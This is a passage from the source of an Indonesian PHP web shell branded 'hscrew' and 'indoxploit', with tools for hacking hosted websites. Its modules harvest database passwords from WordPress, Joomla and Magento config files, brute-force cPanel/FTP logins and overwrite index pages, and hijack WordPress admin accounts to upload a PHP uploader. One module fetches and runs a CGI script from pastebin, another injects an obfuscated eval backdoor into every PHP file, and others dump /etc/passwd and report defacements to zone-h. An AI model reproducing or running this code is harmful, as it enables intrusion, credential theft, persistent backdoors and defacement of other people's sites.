  3333. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3334. } else {
  3335. echo "<font color=lime>Succes</font><br>";
  3336. }
  3337. echo "</div>";
  3338. mysql_close($conn);
  3339. }
  3340. }
  3341. } else {
  3342. echo "<center>
  3343. <h1>Auto Edit Title+Content WordPress</h1>
  3344. <form method='post'>
  3345. DIR Config: <br>
  3346. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3347. Set Title: <br>
  3348. <input type='text' name='new_title' value='Hacked By hscrew' placeholder='New Title'><br><br>
  3349. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3350. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3351. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3352. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3353. </form>
  3354. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3355. ";
  3356. }
  3357. } elseif($_GET['do'] == 'zoneh') {
  3358. if($_POST['submit']) {
  3359. $domain = explode("\r\n", $_POST['url']);
  3360. $nick = $_POST['nick'];
  3361. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3362. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3363. function zoneh($url,$nick) {
  3364. $ch = curl_init("http://www.zone-h.com/notify/single");
  3365. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3366. curl_setopt($ch, CURLOPT_POST, true);
  3367. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3368. return curl_exec($ch);
  3369. curl_close($ch);
  3370. }
  3371. foreach($domain as $url) {
  3372. $zoneh = zoneh($url,$nick);
  3373. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3374. echo "$url -> <font color=lime>OK</font><br>";
  3375. } else {
  3376. echo "$url -> <font color=red>ERROR</font><br>";
  3377. }
  3378. }
  3379. } else {
  3380. echo "<center><form method='post'>
  3381. <u>Defacer</u>: <br>
  3382. <input type='text' name='nick' size='50' value='hscrew'><br>
  3383. <u>Domains</u>: <br>
  3384. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3385. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3386. </form>";
  3387. }
  3388. echo "</center>";
  3389. }elseif($_GET['do'] == 'cpftp_auto') {
  3390. if($_POST['crack']) {
  3391. $usercp = explode("\r\n", $_POST['user_cp']);
  3392. $passcp = explode("\r\n", $_POST['pass_cp']);
  3393. $i = 0;
  3394. foreach($usercp as $ucp) {
  3395. foreach($passcp as $pcp) {
  3396. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3397. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3398. } else {
  3399. $_SESSION[$ucp] = "1";
  3400. $_SESSION[$pcp] = "1";
  3401. if($ucp == '' || $pcp == '') {
  3402. //
  3403. } else {
  3404. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3405. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3406. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3407. if((!$ftp_login) || (!$ftp_conn)) {
  3408. echo "[+] <font color=red>Login Gagal</font><br><br>";
  3409. } else {
  3410. echo "[+] <font color=lime>Login Sukses</font><br>";
  3411. $fi = htmlspecialchars($_POST['file_deface']);
  3412. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3413. if($deface) {
  3414. $i++;
  3415. echo "[+] <font color=lime>Deface Sukses</font><br>";
  3416. if(function_exists('posix_getpwuid')) {
  3417. $domain_cp = file_get_contents("/etc/named.conf");
  3418. if($domain_cp == '') {
  3419. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3420. } else {
  3421. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3422. foreach($domains_cp[1] as $dj) {
  3423. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3424. $user_cp_url = $user_cp_url['name'];
  3425. if($user_cp_url == $ucp) {
  3426. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3427. break;
  3428. }
  3429. }
  3430. }
  3431. } else {
  3432. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3433. }
  3434. } else {
  3435. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3436. }
  3437. }
  3438. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3439. }
  3440. }
  3441. }
  3442. }
  3443. }
  3444. if($i == 0) {
  3445. } else {
  3446. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>hscrew.</font>";
  3447. }
  3448. } else {
  3449. echo "<center>
  3450. <form method='post'>
  3451. Filename: <br>
  3452. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3453. Deface Page: <br>
  3454. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3455. USER: <br>
  3456. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3457. $_usercp = fopen("/etc/passwd","r");
  3458. while($getu = fgets($_usercp)) {
  3459. if($getu == '' || !$_usercp) {
  3460. echo "<font color=red>Can't read /etc/passwd</font>";
  3461. } else {
  3462. preg_match_all("/(.*?):x:/", $getu, $u);
  3463. foreach($u[1] as $user_cp) {
  3464. if(is_dir("/home/$user_cp/public_html")) {
  3465. echo "$user_cp\n";
  3466. }
  3467. }
  3468. }
  3469. }
  3470. echo "</textarea><br>
  3471. PASS: <br>
  3472. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3473. function cp_pass($dir) {
  3474. $pass = "";
  3475. $dira = scandir($dir);
  3476. foreach($dira as $dirb) {
  3477. if(!is_file("$dir/$dirb")) continue;
  3478. $ambil = file_get_contents("$dir/$dirb");
  3479. if(preg_match("/WordPress/", $ambil)) {
  3480. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3481. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3482. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3483. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3484. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3485. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3486. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3487. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3488. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3489. } elseif(preg_match("/client/", $ambil)) {
  3490. preg_match("/password=(.*)/", $ambil, $pass1);
  3491. if(preg_match('/"/', $pass1[1])) {
  3492. $pass1[1] = str_replace('"', "", $pass1[1]);
  3493. $pass .= $pass1[1]."\n";
  3494. }
  3495. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3496. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3497. }
  3498. }
  3499. echo $pass;
  3500. }
  3501. $cp_pass = cp_pass($dir);
  3502. echo $cp_pass;
  3503. echo "</textarea><br>
  3504. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3505. </form>
  3506. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3507. }
  3508. }
  3509. elseif($_GET['do'] == 'cgi') {
  3510. $cgi_dir = mkdir('idx_cgi', 0755);
  3511. $file_cgi = "idx_cgi/cgi.izo";
  3512. $isi_htcgi = "AddHandler cgi-script .izo";
  3513. $htcgi = fopen(".htaccess", "w");
  3514. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3515. $cgi = fopen($file_cgi, "w");
  3516. fwrite($cgi, $cgi_script);
  3517. fwrite($htcgi, $isi_htcgi);
  3518. chmod($file_cgi, 0755);
  3519. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3520. } elseif($_GET['do'] == 'fake_root') {
  3521. ob_start();
  3522. function reverse($url) {
  3523. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3524. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3525. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  3526. curl_setopt($ch, CURLOPT_HEADER, 0);
  3527. curl_setopt($ch, CURLOPT_POST, 1);
  3528. $resp = curl_exec($ch);
  3529. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3530. $array = explode(",,", $resp);
  3531. unset($array[0]);
  3532. foreach($array as $lnk) {
  3533. $lnk = "http://$lnk";
  3534. $lnk = str_replace(",", "", $lnk);
  3535. echo $lnk."\n";
  3536. ob_flush();
  3537. flush();
  3538. }
  3539. curl_close($ch);
  3540. }
  3541. function cek($url) {
  3542. $ch = curl_init($url);
  3543. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3544. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3545. $resp = curl_exec($ch);
  3546. return $resp;
  3547. }
  3548. $cwd = getcwd();
  3549. $ambil_user = explode("/", $cwd);
  3550. $user = $ambil_user[2];
  3551. if($_POST['reverse']) {
  3552. $site = explode("\r\n", $_POST['url']);
  3553. $file = $_POST['file'];
  3554. foreach($site as $url) {
  3555. $cek = cek("$url/~$user/$file");
  3556. if(preg_match("/hacked/i", $cek)) {
  3557. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3558. }
  3559. }
  3560. } else {
  3561. echo "<center><form method='post'>
  3562. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3563. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3564. Domain: <br>
  3565. <textarea style='width: 450px; height: 250px;' name='url'>";
  3566. reverse($_SERVER['HTTP_HOST']);
  3567. echo "</textarea><br>
  3568. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3569. </form><br>
  3570. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3571. }
  3572. } elseif($_GET['do'] == 'adminer') {
  3573. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3574. function adminer($url, $isi) {
  3575. $fp = fopen($isi, "w");
  3576. $ch = curl_init();
  3577. curl_setopt($ch, CURLOPT_URL, $url);
  3578. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3579. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3580. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3581. curl_setopt($ch, CURLOPT_FILE, $fp);
  3582. return curl_exec($ch);
  3583. curl_close($ch);
  3584. fclose($fp);
  3585. ob_flush();
  3586. flush();
  3587. }
  3588. if(file_exists('adminer.php')) {
  3589. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3590. } else {
  3591. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3592. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3593. } else {
  3594. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3595. }
  3596. }
  3597. }elseif($_GET['do'] == 'injectcode') {?><center>
  3598. <form method='POST'>
  3599. <table>
  3600. <tr>
  3601. <td width="100" class="title">
  3602. Directory
  3603. </td>
  3604. <td>
  3605. <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3606. </td>
  3607.  
  3608. </tr>
  3609. <tr>
  3610. <td class="title">
  3611. Mode
  3612. </td>
  3613. <td>
  3614. <select style="width: 400px;" name="mode" class="box">
  3615. <option value="Apender">Apender</option>
  3616. <option value="Overwriter">Overwriter</option>
  3617. </select>
  3618. </td>
  3619. </tr>
  3620. <tr>
  3621. <td class="title">
  3622. File Type
  3623. </td>
  3624. <td>
  3625. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3626. </td>
  3627. </tr>
  3628. <tr>
  3629. <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3630. </tr>
  3631.  
  3632. <tr>
  3633. <td colspan="2">
  3634. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
  3635. </td>
  3636. </tr>
  3637. <tr>
  3638. <td rowspan="2">
  3639. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
  3640. </td>
  3641. </tr>
  3642. </form>
  3643. </table><div id="showinject"</div> <?php
  3644. $filetype = $_POST['filetype'];
  3645. $mode = "a";
  3646. if($_POST['mode'] == 'Apender')
  3647. $mode = "a";
  3648. if($_POST['mode'] == 'Overwriter')
  3649. $mode = "w";
  3650. if (is_dir($_POST['pathtomass']))
  3651. {
  3652. $lolinject = $_POST['injectthis'];
  3653. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
  3654. if(substr($_POST['pathtomass'], -1) == "\\")
  3655. $mypath = $_POST['pathtomass'] . "*.".$filetype;
  3656. foreach (glob($mypath) as $injectj00)
  3657. {
  3658. if($injectj00 == __FILE__)
  3659. continue;
  3660. $fp=fopen($injectj00,$mode);
  3661. if (fputs($fp,$lolinject))
  3662. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
  3663. else
  3664. echo 'failed to inject '.$injectj00.'<br>';
  3665. }
  3666. }
  3667. else
  3668. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
  3669. }
  3670.  
  3671. elseif($_GET['do'] == 'passwbypass') {
  3672. echo '<center>Bypass etc/passw With:<br>
  3673. <table style="width:50%">
  3674. <tr>
  3675. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3676. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3677. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3678. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3679. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3680. </tr></table>Bypass User With : <table style="width:50%">
  3681. <tr>
  3682. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3683. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3684. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3685. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3686. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3687. </tr>
  3688. </table><br>';
  3689.  
  3690.  
  3691. if ($_POST['awkuser']) {
  3692. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3693. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3694. echo "</textarea><br>";
  3695. }
  3696. if ($_POST['systuser']) {
  3697. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3698. echo system("ls /var/mail");
  3699. echo "</textarea><br>";
  3700. }
  3701. if ($_POST['passthuser']) {
  3702. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3703. echo passthru("ls /var/mail");
  3704. echo "</textarea><br>";
  3705. }
  3706. if ($_POST['exuser']) {
  3707. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3708. echo exec("ls /var/mail");
  3709. echo "</textarea><br>";
  3710. }
  3711. if ($_POST['shexuser']) {
  3712. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3713. echo shell_exec("ls /var/mail");
  3714. echo "</textarea><br>";
  3715. }
  3716. if($_POST['syst'])
  3717. {
  3718. echo"<textarea class='inputz' cols='65' rows='15'>";
  3719. echo system("cat /etc/passwd");
  3720. echo"</textarea><br><br><b></b><br>";
  3721. }
  3722. if($_POST['passth'])
  3723. {
  3724. echo"<textarea class='inputz' cols='65' rows='15'>";
  3725. echo passthru("cat /etc/passwd");
  3726. echo"</textarea><br><br><b></b><br>";
  3727. }
  3728. if($_POST['ex'])
  3729. {
  3730. echo"<textarea class='inputz' cols='65' rows='15'>";
  3731. echo exec("cat /etc/passwd");
  3732. echo"</textarea><br><br><b></b><br>";
  3733. }
  3734. if($_POST['shex'])
  3735. {
  3736. echo"<textarea class='inputz' cols='65' rows='15'>";
  3737. echo shell_exec("cat /etc/passwd");
  3738. echo"</textarea><br><br><b></b><br>";
  3739. }
  3740. echo '<center>';
  3741. if($_POST['melex'])
  3742. {
  3743. echo"<textarea class='inputz' cols='65' rows='15'>";
  3744. for($uid=0;$uid<60000;$uid++){
  3745. $ara = posix_getpwuid($uid);
  3746. if (!empty($ara)) {
  3747. while (list ($key, $val) = each($ara)){
  3748. print "$val:";
  3749. }
  3750. print "\n";
  3751. }
  3752. }
  3753. echo"</textarea><br><br>";
  3754. }
  3755. //
  3756.  
  3757. //
  3758. } elseif($_GET['do'] == 'auto_dwp') {
  3759. if($_POST['auto_deface_wp']) {
  3760. function anucurl($sites) {
  3761. $ch = curl_init($sites);
  3762. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3763. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3764. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3765. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3766. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3767. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3768. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3769. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3770. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3771. $data = curl_exec($ch);
  3772. curl_close($ch);
  3773. return $data;
  3774. }
  3775. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3776. $post = array(
  3777. "log" => "$userr",
  3778. "pwd" => "$pass",
  3779. "rememberme" => "forever",
  3780. "wp-submit" => "$wp_submit",
  3781. "redirect_to" => "$web",
  3782. "testcookie" => "1",
  3783. );
  3784. $ch = curl_init($cek);
  3785. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3786. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3787. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3788. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3789. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3790. curl_setopt($ch, CURLOPT_POST, 1);
  3791. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3792. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3793. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3794. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3795. $data = curl_exec($ch);
  3796. curl_close($ch);
  3797. return $data;
  3798. }
  3799. $scan = $_POST['link_config'];
  3800. $link_config = scandir($scan);
  3801. $script = htmlspecialchars($_POST['script']);
  3802. $user = "hscrew";
  3803. $pass = "hscrew";
  3804. $passx = md5($pass);
  3805. foreach($link_config as $dir_config) {
  3806. if(!is_file("$scan/$dir_config")) continue;
  3807. $config = file_get_contents("$scan/$dir_config");
  3808. if(preg_match("/WordPress/", $config)) {
  3809. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3810. $dbuser = ambilkata($config,"DB_USER', '","'");
  3811. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3812. $dbname = ambilkata($config,"DB_NAME', '","'");
  3813. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3814. $prefix = $dbprefix."users";
  3815. $option = $dbprefix."options";
  3816. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3817. $db = mysql_select_db($dbname);
  3818. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3819. $result = mysql_fetch_array($q);
  3820. $id = $result[ID];
  3821. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3822. $result2 = mysql_fetch_array($q2);
  3823. $target = $result2[option_value];
  3824. if($target == '') {
  3825. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3826. } else {
  3827. echo "[+] $target <br>";
  3828. }
  3829. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3830. if(!$conn OR !$db OR !$update) {
  3831. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3832. mysql_close($conn);
  3833. } else {
  3834. $site = "$target/wp-login.php";
  3835. $site2 = "$target/wp-admin/theme-install.php?upload";
  3836. $b1 = anucurl($site2);
  3837. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3838. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3839. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3840. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3841. $www = "m.php";
  3842. $fp5 = fopen($www,"w");
  3843. fputs($fp5,$upload3);
  3844. $post2 = array(
  3845. "_wpnonce" => "$anu2",
  3846. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3847. "themezip" => "@$www",
  3848. "install-theme-submit" => "Install Now",
  3849. );
  3850. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3851. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3852. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3853. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3854. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3855. curl_setopt($ch, CURLOPT_POST, 1);
  3856. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3857. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3858. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3859. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3860. $data3 = curl_exec($ch);
  3861. curl_close($ch);
  3862. $y = date("Y");
  3863. $m = date("m");
  3864. $namafile = "id.php";
  3865. $fpi = fopen($namafile,"w");
  3866. fputs($fpi,$script);
  3867. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3868. curl_setopt($ch6, CURLOPT_POST, true);
  3869. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3870. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3871. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3872. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3873. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3874. $postResult = curl_exec($ch6);
  3875. curl_close($ch6);
  3876. $as = "$target/k.php";
  3877. $bs = anucurl($as);
  3878. if(preg_match("#$script#is", $bs)) {
  3879. echo "[+] <font color='lime'>Sukses</font><br>";
  3880. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3881. } else {
  3882. echo "[-] <font color='red'>Gagal</font><br>";
  3883. echo "[!!] coba aja manual: <br>";
  3884. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3885. echo "[+] username: <font color=lime>$user</font><br>";
  3886. echo "[+] password: <font color=lime>$pass</font><br><br>";
  3887. }
  3888. mysql_close($conn);
  3889. }
  3890. }
  3891. }
  3892. } else {
  3893. echo "<center><h1>WordPress Auto Deface</h1>
  3894. <form method='post'>
  3895. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3896. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Hunter Security Crew' required><br>
  3897. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3898. </form>
  3899. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3900. </center>";
  3901. }
  3902. } elseif($_GET['do'] == 'auto_dwp2') {
  3903. if($_POST['auto_deface_wp']) {
  3904. function anucurl($sites) {
  3905. $ch = curl_init($sites);
  3906. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3907. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3908. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3909. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3910. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3911. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3912. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3913. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3914. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3915. $data = curl_exec($ch);
  3916. curl_close($ch);
  3917. return $data;
  3918. }
  3919. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3920. $post = array(
  3921. "log" => "$userr",
  3922. "pwd" => "$pass",
  3923. "rememberme" => "forever",
  3924. "wp-submit" => "$wp_submit",
  3925. "redirect_to" => "$web",
  3926. "testcookie" => "1",
  3927. );
  3928. $ch = curl_init($cek);
  3929. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3930. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3931. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3932. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3933. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3934. curl_setopt($ch, CURLOPT_POST, 1);
  3935. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3936. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3937. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3938. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3939. $data = curl_exec($ch);
  3940. curl_close($ch);
  3941. return $data;
  3942. }
  3943. $link = explode("\r\n", $_POST['link']);
  3944. $script = htmlspecialchars($_POST['script']);
  3945. $user = "indoxploit";
  3946. $pass = "indoxploit";
  3947. $passx = md5($pass);
  3948. foreach($link as $dir_config) {
  3949. $config = anucurl($dir_config);
  3950. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3951. $dbuser = ambilkata($config,"DB_USER', '","'");
  3952. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3953. $dbname = ambilkata($config,"DB_NAME', '","'");
  3954. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3955. $prefix = $dbprefix."users";
  3956. $option = $dbprefix."options";
  3957. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3958. $db = mysql_select_db($dbname);
  3959. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3960. $result = mysql_fetch_array($q);
  3961. $id = $result[ID];
  3962. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3963. $result2 = mysql_fetch_array($q2);
  3964. $target = $result2[option_value];
  3965. if($target == '') {
  3966. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3967. } else {
  3968. echo "[+] $target <br>";
  3969. }
  3970. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3971. if(!$conn OR !$db OR !$update) {
  3972. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
